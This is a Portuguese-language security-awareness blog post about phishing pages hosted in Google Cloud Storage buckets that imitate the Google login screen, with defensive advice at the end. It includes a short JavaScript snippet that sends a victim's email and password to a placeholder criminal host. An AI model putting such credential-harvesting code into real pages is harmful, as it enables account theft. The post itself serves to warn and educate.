Ataques de FISHING usando o Próprio GOOGLE

⚠️ O phishing ficou profissional — e você provavelmente cairia



Vou começar direto:


**eu quase caí.**


Sim — anos mexendo com infraestrutura, segurança, redes, datacenter… e mesmo assim, por alguns segundos, meu cérebro aceitou aquilo como legítimo.


O link era esse aqui:




Olha isso com calma.


Respira.


Agora me responde:


👉 Você bateria o olho e desconfiaria imediatamente?


Se você respondeu “sim”, parabéns — você é melhor que 99% das pessoas… ou está se enganando.


Porque o problema aqui não é só técnico.


É psicológico.


---


## 🧠 O golpe não é o link — é a confiança


Vamos desmontar isso peça por peça.


**`storage.cloud.google.com`**


Isso não é um domínio falso.


Isso é o Google.


HTTPS válido. Cadeado bonito. Certificado perfeito. Tudo “certinho”.


E é exatamente isso que torna o ataque genial.


👉 O atacante não falsificou nada.

👉 Ele alugou um espaço dentro da casa do Google.


---


## ⚙️ O truque sujo (e extremamente eficaz)


O que está acontecendo nesse link:


```text

/handalal/handalal_uk26.html

```


Isso é só um arquivo HTML jogado dentro de um bucket qualquer.


Nada impede alguém de subir isso no Google Cloud.


Nada.


Agora vem a parte mais malandra:


```text

#4lPEEr10349uaGk609poymabhdya...

```


Isso aqui?


👉 Não vai pro servidor

👉 Não aparece em logs

👉 Não é filtrado direito


Só o navegador vê.


Ou seja:


* Dá pra identificar a vítima

* Dá pra personalizar a página

* Dá pra fazer engenharia social direcionada


---


## 🎭 A mágica acontece quando você abre


Você clica.


Carrega.


E pronto:


💥 **Tela de login do Google. Idêntica.**


Não “parecida”.


**Idêntica.**


Mesma tipografia

Mesmo layout

Mesmo fluxo mental que você já repetiu mil vezes


E é aí que o cérebro desliga.


---


## 🧠 O momento crítico: o piloto automático


Você não está mais analisando.


Você está reagindo.


* “Ah, preciso logar”

* “Deve ter expirado a sessão”

* “Normal”


E pronto.


👉 Digitou email

👉 Digitou senha


Game over.


---


## 💀 O roubo é ridiculamente simples


Por trás da tela bonita, tem algo assim:


```javascript

fetch("https://servidor-do-criminoso.xyz/collect", {

  method: "POST",

  body: JSON.stringify({

    email: email,

    password: password

  })

});

```


Acabou.


Sem exploit.

Sem zero-day.

Sem hack sofisticado.


Só você… entregando.


---


## 🤡 “Mas eu olho o link antes de clicar”


Olha mesmo?


Vamos revisar:


https://storage.cloud.google.com/o-nome-do-bucket-se-quiser-sofre-o-golpe-veja-na-foto/halalal.html



* Domínio do Google ✔

* HTTPS ✔

* Nada de “g00gle” fake ✔


Esse ataque **passa fácil** por:


* usuários comuns

* funcionários treinados

* e sim… até gente técnica


Eu incluído.


---


## 🔥 Por que isso é MUITO mais perigoso que phishing antigo


Antigamente:


* domínios falsos

* erros de português

* layout mal feito


Hoje:


👉 Infraestrutura real

👉 Certificados válidos

👉 UI perfeita

👉 Scripts leves e rápidos


Isso aqui não é mais “golpista amador”.


É operação profissional.


---


## 🧨 O pior de tudo: isso escala absurdamente


Esse modelo permite:


* milhares de páginas

* rotação de links

* personalização por vítima

* bypass de filtros


E como está dentro de um domínio confiável:


👉 muitos sistemas de segurança simplesmente deixam passar


---


## 🚨 O que me fez travar (e pode te salvar)


O que me fez parar não foi o domínio.


Foi o contexto.


👉 “Por que o Google está me pedindo login aqui?”

👉 “Por que direto num HTML?”


Esse tipo de pergunta salva.


Não é tecnologia.


É desconfiança ativa.


---


## 🛡️ A regra de ouro (que ninguém segue)


Nunca.


Nunca mesmo.


👉 Digite credenciais depois de clicar em link.


Se precisar logar:


* abre nova aba

* entra manualmente

* ignora o link


Simples.


E extremamente eficaz.


---


## 💣 Conclusão: você não é tão imune quanto acha


Esse tipo de ataque expõe uma verdade incômoda:


👉 segurança não falha só na tecnologia

👉 ela falha na confiança


Se até alguém experiente pode hesitar…


imagina um usuário comum, cansado, no celular, no meio do dia.


Esse ataque não depende de vulnerabilidade técnica.


Depende de uma coisa muito mais previsível:


👉 comportamento humano


---


## 🧠 Última provocação


Se você trabalha com TI, segurança ou infraestrutura:


**quantas pessoas na sua empresa cairiam nisso hoje?**


Agora seja honesto.


E depois pense:


👉 o problema é o usuário… ou o sistema que você construiu?


---


Se você quiser, no próximo post posso destrinchar:


* como detectar isso em proxy/WAF

* como bloquear no DNS corporativo

* como criar simulações internas de phishing desse nível


Porque uma coisa é certa:


👉 isso aqui já está acontecendo — e em escala.


Identificarse dejar un comentario
Soberania digital sem projeto continental é motor potente com o cárter seco
Uma reflexão sobre dependência tecnológica, coordenação continental e o risco de construir redes potentes com o cárter político seco.